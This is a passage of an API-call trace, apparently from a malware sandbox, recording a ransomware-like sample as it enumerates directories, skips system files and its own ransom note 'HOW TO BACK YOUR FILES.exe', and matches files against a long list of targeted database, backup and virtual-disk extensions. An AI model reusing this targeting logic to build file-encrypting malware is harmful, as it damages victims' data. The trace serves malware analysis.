nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.542] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.542] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.542] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.542] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.542] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="aoldtz.exe") returned 1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2=".") returned 1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="..") returned 1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="windows") returned -1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="bootmgr") returned 1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="temp") returned -1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="pagefile.sys") returned -1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="boot") returned 1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="ids.txt") returned -1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="ntuser.dat") returned -1 [0060.542] lstrcmpiW (lpString1="Gadgets", lpString2="perflogs") returned -1 [0060.543] lstrcmpiW (lpString1="Gadgets", lpString2="MSBuild") returned -1 [0060.543] lstrlenW (lpString="Gadgets") returned 7 [0060.543] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\*") returned 64 [0060.543] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Gadgets" | out: lpString1="Gadgets") returned="Gadgets" [0060.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0060.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x2d1ea0 [0060.543] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2388 | out: ListHead=0x2e7710, ListEntry=0x2d2388) returned 0x2d2368 [0060.543] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.543] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.543] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.ini", cAlternateFileName="")) returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="aoldtz.exe") returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2=".") returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="..") returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="windows") returned -1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="bootmgr") returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="temp") returned -1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="pagefile.sys") returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="boot") returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="ids.txt") returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="ntuser.dat") returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="perflogs") returned 1 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2="MSBuild") returned 1 [0060.543] lstrlenW (lpString="Settings.ini") returned 12 [0060.543] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets") returned 70 [0060.543] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Settings.ini" | out: lpString1="Settings.ini") returned="Settings.ini" [0060.543] lstrlenW (lpString="Settings.ini") returned 12 [0060.543] lstrlenW (lpString="Ares865") returned 7 [0060.543] lstrcmpiW (lpString1="ngs.ini", lpString2="Ares865") returned 1 [0060.543] lstrlenW (lpString=".dll") returned 4 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2=".dll") returned 1 [0060.543] lstrlenW (lpString=".lnk") returned 4 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2=".lnk") returned 1 [0060.543] lstrlenW (lpString=".ini") returned 4 [0060.543] lstrcmpiW (lpString1="Settings.ini", lpString2=".ini") returned 1 [0060.544] lstrlenW (lpString=".sys") returned 4 [0060.544] lstrcmpiW (lpString1="Settings.ini", lpString2=".sys") returned 1 [0060.544] lstrlenW (lpString="Settings.ini") returned 12 [0060.544] lstrlenW (lpString="bak") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0060.544] lstrlenW (lpString="ba_") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0060.544] lstrlenW (lpString="dbb") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0060.544] lstrlenW (lpString="vmdk") returned 4 [0060.544] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0060.544] lstrlenW (lpString="rar") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0060.544] lstrlenW (lpString="zip") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0060.544] lstrlenW (lpString="tgz") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0060.544] lstrlenW (lpString="vbox") returned 4 [0060.544] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0060.544] lstrlenW (lpString="vdi") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0060.544] lstrlenW (lpString="vhd") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0060.544] lstrlenW (lpString="vhdx") returned 4 [0060.544] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0060.544] lstrlenW (lpString="avhd") returned 4 [0060.544] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0060.544] lstrlenW (lpString="db") returned 2 [0060.544] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0060.544] lstrlenW (lpString="db2") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0060.544] lstrlenW (lpString="db3") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0060.544] lstrlenW (lpString="dbf") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0060.544] lstrlenW (lpString="mdf") returned 3 [0060.544] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0060.544] lstrlenW (lpString="mdb") returned 3 [0060.545] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0060.545] lstrlenW (lpString="sql") returned 3 [0060.545] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0060.545] lstrlenW (lpString="sqlite") returned 6 [0060.545] lstrcmpiW (lpString1="gs.ini", lpString2="sqlite") returned -1 [0060.545] lstrlenW (lpString="sqlite3") returned 7 [0060.545] lstrcmpiW (lpString1="ngs.ini", lpString2="sqlite3") returned -1 [0060.545] lstrlenW (lpString="sqlitedb") returned 8 [0060.545] lstrcmpiW (lpString1="ings.ini", lpString2="sqlitedb") returned -1 [0060.545] lstrlenW (lpString="xml") returned 3 [0060.545] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0060.545] lstrlenW (lpString="$er") returned 3 [0060.545] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0060.545] lstrlenW (lpString="4dd") returned 3 [0060.545] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0060.545] lstrlenW (lpString="4dl") returned 3 [0060.545] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0060.545] lstrlenW (lpString="^^^") returned 3 [0060.545] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0060.545] lstrlenW (lpString="abs") returned 3 [0060.545] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0060.545] lstrlenW (lpString="abx") returned 3 [0060.545] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0060.545] lstrlenW (lpString="accdb") returned 5 [0060.545] lstrcmpiW (lpString1="s.ini", lpString2="accdb") returned 1 [0060.545] lstrlenW (lpString="accdc") returned 5 [0060.545] lstrcmpiW (lpString1="s.ini", lpString2="accdc") returned 1 [0060.545] lstrlenW (lpString="accde") returned 5 [0060.545] lstrcmpiW (lpString1="s.ini", lpString2="accde") returned 1 [0060.545] lstrlenW (lpString="accdr") returned 5 [0060.545] lstrcmpiW (lpString1="s.ini", lpString2="accdr") returned 1 [0060.545] lstrlenW (lpString="accdt") returned 5 [0060.545] lstrcmpiW (lpString1="s.ini", lpString2="accdt") returned 1 [0060.545] lstrlenW (lpString="accdw") returned 5 [0060.545] lstrcmpiW (lpString1="s.ini", lpString2="accdw") returned 1 [0060.545] lstrlenW (lpString="accft") returned 5 [0060.545] lstrcmpiW (lpString1="s.ini", lpString2="accft") returned 1 [0060.545] lstrlenW (lpString="adb") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.546] lstrlenW (lpString="adb") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.546] lstrlenW (lpString="ade") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0060.546] lstrlenW (lpString="adf") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0060.546] lstrlenW (lpString="adn") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0060.546] lstrlenW (lpString="adp") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0060.546] lstrlenW (lpString="alf") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0060.546] lstrlenW (lpString="ask") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0060.546] lstrlenW (lpString="btr") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0060.546] lstrlenW (lpString="cat") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0060.546] lstrlenW (lpString="cdb") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0060.546] lstrlenW (lpString="ckp") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0060.546] lstrlenW (lpString="cma") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0060.546] lstrlenW (lpString="cpd") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0060.546] lstrlenW (lpString="dacpac") returned 6 [0060.546] lstrcmpiW (lpString1="gs.ini", lpString2="dacpac") returned 1 [0060.546] lstrlenW (lpString="dad") returned 3 [0060.546] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0060.546] lstrlenW (lpString="dadiagrams") returned 10 [0060.546] lstrcmpiW (lpString1="ttings.ini", lpString2="dadiagrams") returned 1 [0060.546] lstrlenW (lpString="daschema") returned 8 [0060.546] lstrcmpiW (lpString1="ings.ini", lpString2="daschema") returned 1 [0060.546] lstrlenW (lpString="db-journal") returned 10 [0060.546] lstrcmpiW (lpString1="ttings.ini", lpString2="db-journal") returned 1 [0060.547] lstrlenW (lpString="db-shm") returned 6 [0060.547] lstrcmpiW (lpString1="gs.ini", lpString2="db-shm") returned 1 [0060.547] lstrlenW (lpString="db-wal") returned 6 [0060.547] lstrcmpiW (lpString1="gs.ini", lpString2="db-wal") returned 1 [0060.547] lstrlenW (lpString="dbc") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0060.547] lstrlenW (lpString="dbs") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0060.547] lstrlenW (lpString="dbt") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0060.547] lstrlenW (lpString="dbv") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0060.547] lstrlenW (lpString="dbx") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0060.547] lstrlenW (lpString="dcb") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0060.547] lstrlenW (lpString="dct") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0060.547] lstrlenW (lpString="dcx") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0060.547] lstrlenW (lpString="ddl") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0060.547] lstrlenW (lpString="dlis") returned 4 [0060.547] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0060.547] lstrlenW (lpString="dp1") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0060.547] lstrlenW (lpString="dqy") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0060.547] lstrlenW (lpString="dsk") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0060.547] lstrlenW (lpString="dsn") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0060.547] lstrlenW (lpString="dtsx") returned 4 [0060.547] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0060.547] lstrlenW (lpString="dxl") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0060.547] lstrlenW (lpString="eco") returned 3 [0060.547] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0060.548] lstrlenW (lpString="ecx") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0060.548] lstrlenW (lpString="edb") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0060.548] lstrlenW (lpString="epim") returned 4 [0060.548] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0060.548] lstrlenW (lpString="fcd") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0060.548] lstrlenW (lpString="fdb") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0060.548] lstrlenW (lpString="fic") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0060.548] lstrlenW (lpString="flexolibrary") returned 12 [0060.548] lstrlenW (lpString="fm5") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0060.548] lstrlenW (lpString="fmp") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0060.548] lstrlenW (lpString="fmp12") returned 5 [0060.548] lstrcmpiW (lpString1="s.ini", lpString2="fmp12") returned 1 [0060.548] lstrlenW (lpString="fmpsl") returned 5 [0060.548] lstrcmpiW (lpString1="s.ini", lpString2="fmpsl") returned 1 [0060.548] lstrlenW (lpString="fol") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0060.548] lstrlenW (lpString="fp3") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0060.548] lstrlenW (lpString="fp4") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0060.548] lstrlenW (lpString="fp5") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0060.548] lstrlenW (lpString="fp7") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0060.548] lstrlenW (lpString="fpt") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0060.548] lstrlenW (lpString="frm") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0060.548] lstrlenW (lpString="gdb") returned 3 [0060.548] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.548] lstrlenW (lpString="gdb") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.549] lstrlenW (lpString="grdb") returned 4 [0060.549] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0060.549] lstrlenW (lpString="gwi") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0060.549] lstrlenW (lpString="hdb") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0060.549] lstrlenW (lpString="his") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0060.549] lstrlenW (lpString="ib") returned 2 [0060.549] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0060.549] lstrlenW (lpString="idb") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0060.549] lstrlenW (lpString="ihx") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0060.549] lstrlenW (lpString="itdb") returned 4 [0060.549] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0060.549] lstrlenW (lpString="itw") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0060.549] lstrlenW (lpString="jet") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0060.549] lstrlenW (lpString="jtx") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0060.549] lstrlenW (lpString="kdb") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0060.549] lstrlenW (lpString="kexi") returned 4 [0060.549] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0060.549] lstrlenW (lpString="kexic") returned 5 [0060.549] lstrcmpiW (lpString1="s.ini", lpString2="kexic") returned 1 [0060.549] lstrlenW (lpString="kexis") returned 5 [0060.549] lstrcmpiW (lpString1="s.ini", lpString2="kexis") returned 1 [0060.549] lstrlenW (lpString="lgc") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0060.549] lstrlenW (lpString="lwx") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0060.549] lstrlenW (lpString="maf") returned 3 [0060.549] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0060.549] lstrlenW (lpString="maq") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0060.550] lstrlenW (lpString="mar") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0060.550] lstrlenW (lpString="marshal") returned 7 [0060.550] lstrcmpiW (lpString1="ngs.ini", lpString2="marshal") returned 1 [0060.550] lstrlenW (lpString="mas") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0060.550] lstrlenW (lpString="mav") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0060.550] lstrlenW (lpString="maw") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0060.550] lstrlenW (lpString="mdbhtml") returned 7 [0060.550] lstrcmpiW (lpString1="ngs.ini", lpString2="mdbhtml") returned 1 [0060.550] lstrlenW (lpString="mdn") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0060.550] lstrlenW (lpString="mdt") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0060.550] lstrlenW (lpString="mfd") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0060.550] lstrlenW (lpString="mpd") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0060.550] lstrlenW (lpString="mrg") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0060.550] lstrlenW (lpString="mud") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0060.550] lstrlenW (lpString="mwb") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0060.550] lstrlenW (lpString="myd") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0060.550] lstrlenW (lpString="ndf") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0060.550] lstrlenW (lpString="nnt") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0060.550] lstrlenW (lpString="nrmlib") returned 6 [0060.550] lstrcmpiW (lpString1="gs.ini", lpString2="nrmlib") returned -1 [0060.550] lstrlenW (lpString="ns2") returned 3 [0060.550] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0060.550] lstrlenW (lpString="ns3") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0060.551] lstrlenW (lpString="ns4") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0060.551] lstrlenW (lpString="nsf") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0060.551] lstrlenW (lpString="nv") returned 2 [0060.551] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0060.551] lstrlenW (lpString="nv2") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0060.551] lstrlenW (lpString="nwdb") returned 4 [0060.551] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0060.551] lstrlenW (lpString="nyf") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0060.551] lstrlenW (lpString="odb") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.551] lstrlenW (lpString="odb") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.551] lstrlenW (lpString="oqy") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0060.551] lstrlenW (lpString="ora") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0060.551] lstrlenW (lpString="orx") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0060.551] lstrlenW (lpString="owc") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0060.551] lstrlenW (lpString="p96") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0060.551] lstrlenW (lpString="p97") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0060.551] lstrlenW (lpString="pan") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0060.551] lstrlenW (lpString="pdb") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0060.551] lstrlenW (lpString="pdm") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0060.551] lstrlenW (lpString="pnz") returned 3 [0060.551] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0060.551] lstrlenW (lpString="qry") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0060.552] lstrlenW (lpString="qvd") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0060.552] lstrlenW (lpString="rbf") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0060.552] lstrlenW (lpString="rctd") returned 4 [0060.552] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0060.552] lstrlenW (lpString="rod") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0060.552] lstrlenW (lpString="rodx") returned 4 [0060.552] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0060.552] lstrlenW (lpString="rpd") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0060.552] lstrlenW (lpString="rsd") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0060.552] lstrlenW (lpString="sas7bdat") returned 8 [0060.552] lstrcmpiW (lpString1="ings.ini", lpString2="sas7bdat") returned -1 [0060.552] lstrlenW (lpString="sbf") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0060.552] lstrlenW (lpString="scx") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0060.552] lstrlenW (lpString="sdb") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0060.552] lstrlenW (lpString="sdc") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0060.552] lstrlenW (lpString="sdf") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0060.552] lstrlenW (lpString="sis") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0060.552] lstrlenW (lpString="spq") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0060.552] lstrlenW (lpString="te") returned 2 [0060.552] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0060.552] lstrlenW (lpString="teacher") returned 7 [0060.552] lstrcmpiW (lpString1="ngs.ini", lpString2="teacher") returned -1 [0060.552] lstrlenW (lpString="tmd") returned 3 [0060.552] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0060.552] lstrlenW (lpString="tps") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0060.553] lstrlenW (lpString="trc") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.553] lstrlenW (lpString="trc") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.553] lstrlenW (lpString="trm") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0060.553] lstrlenW (lpString="udb") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0060.553] lstrlenW (lpString="udl") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0060.553] lstrlenW (lpString="usr") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0060.553] lstrlenW (lpString="v12") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0060.553] lstrlenW (lpString="vis") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0060.553] lstrlenW (lpString="vpd") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0060.553] lstrlenW (lpString="vvv") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0060.553] lstrlenW (lpString="wdb") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0060.553] lstrlenW (lpString="wmdb") returned 4 [0060.553] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0060.553] lstrlenW (lpString="wrk") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0060.553] lstrlenW (lpString="xdb") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0060.553] lstrlenW (lpString="xld") returned 3 [0060.553] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0060.553] lstrlenW (lpString="xmlff") returned 5 [0060.553] lstrcmpiW (lpString1="s.ini", lpString2="xmlff") returned -1 